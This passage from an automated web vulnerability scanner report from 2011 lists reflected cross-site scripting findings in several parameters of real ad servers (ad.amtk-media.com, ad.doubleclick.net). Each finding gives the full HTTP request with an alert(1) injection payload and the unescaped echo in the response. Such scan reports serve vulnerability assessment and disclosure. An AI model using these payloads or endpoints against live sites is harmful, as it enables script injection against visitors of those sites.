Severity:	High
Confidence:	Certain
Host:	http://ad.amtk-media.com
Path:	/iframe

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 971a3'%3balert(1)//62435de2831 was submitted in the target parameter. This input was echoed as 971a3';alert(1)//62435de2831 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /iframe?spacedesc=2107089_1090554_728x90_1204852_2107089&target=_blank971a3'%3balert(1)//62435de2831&@CPSC@= HTTP/1.1
Host: ad.amtk-media.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:19 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.amtk-media.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=51-131422997; expires=Sat, 11 May 2013 23:37:19 GMT; path=/; domain=.amtk-media.com
Set-Cookie: CSList=1090498/1090554,0/0,0/0,0/0,0/0; expires=Wed, 10 Aug 2011 11:37:19 GMT; path=/; domain=.amtk-media.com
Content-Type: text/html
Content-Length: 4557
Connection: close

<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://ad.amtk-media.com/image_htmlping?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1091925&t
...[SNIP]...
s/amt_acl_plug_f_728x90_arn.dir/amt_acl_plug_f_728x90_arn.swf';
var flash_name= '"' + swf_name + '"';
var swfVer= 90/10;
var swfMime= 'application/x-shockwave-flash';
var clickTAGs= 'clickTARGET=_blank971a3';alert(1)//62435de2831' + '&clickTAG=' + escape('http://ad.amtk-media.com/click.ng?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1091925&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2107089&ml_camp=1090498&ml_crid=2128670&ml_mul
...[SNIP]...

4.10. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [ad parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df75a"-alert(1)-"b55e37a950c was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3df75a"-alert(1)-"b55e37a950c&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('\r\r\n\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
Bpc%3Dnyt158541A261966%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3df75a"-alert(1)-"b55e37a950c&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg
...[SNIP]...

4.11. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [ad parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fce0c'-alert(1)-'8511ba05b59 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3fce0c'-alert(1)-'8511ba05b59&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('\r\r\n\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
Bpc%3Dnyt158541A261966%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3fce0c'-alert(1)-'8511ba05b59&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary\">
...[SNIP]...

4.12. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [camp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6341e"-alert(1)-"0ee272f6ed was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt16341e"-alert(1)-"0ee272f6ed&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6457

document.write('\r\r\n\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
1409839/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt158541A261966%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt16341e"-alert(1)-"0ee272f6ed&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary");
var fscUrl = url;
var fscUrlClickTagFound = false;
var w
...[SNIP]...

4.13. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [camp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b0f4'-alert(1)-'e7171bb264d was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt17b0f4'-alert(1)-'e7171bb264d&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('\r\r\n\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
1409839/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt158541A261966%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt17b0f4'-alert(1)-'e7171bb264d&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary\">
...[SNIP]...

4.14. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [goto parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61f0c"-alert(1)-"f906c58d3ba was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=61f0c"-alert(1)-"f906c58d3ba HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:41:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('\r\r\n\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
k.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=61f0c"-alert(1)-"f906c58d3bahttp://www.unum.com/voluntary");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var
...[SNIP]...

4.15. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [goto parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78c92'-alert(1)-'1edd0185642 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=78c92'-alert(1)-'1edd0185642 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:41:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('\r\r\n\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
k.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=78c92'-alert(1)-'1edd0185642http://www.unum.com/voluntary\">
...[SNIP]...

4.16. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c26ac"-alert(1)-"4050e370dbe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=&c26ac"-alert(1)-"4050e370dbe=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:42:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6473

document.write('\r\r\n\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=&c26ac"-alert(1)-"4050e370dbe=1http://www.unum.com/voluntary");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
va
...[SNIP]...

4.17. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3d94'-alert(1)-'1f7a615340a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=&d3d94'-alert(1)-'1f7a615340a=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:42:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6473

document.write('\r\r\n\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=&d3d94'-alert(1)-'1f7a615340a=1http://www.unum.com/voluntary\">
...[SNIP]...

4.18. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [opzn&page parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 411c7'-alert(1)-'2d5dec84db9 was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post411c7'-alert(1)-'2d5dec84db9&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('\r\r\n\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
%3B61866713%3B3454-728/90%3B41392052/41409839/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt158541A261966%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post411c7'-alert(1)-'2d5dec84db9&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary\">
...[SNIP]...

4.19. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [opzn&page parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a6ae"-alert(1)-"34c68b6b7ed was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post3a6ae"-alert(1)-"34c68b6b7ed&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('\r\r\n\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
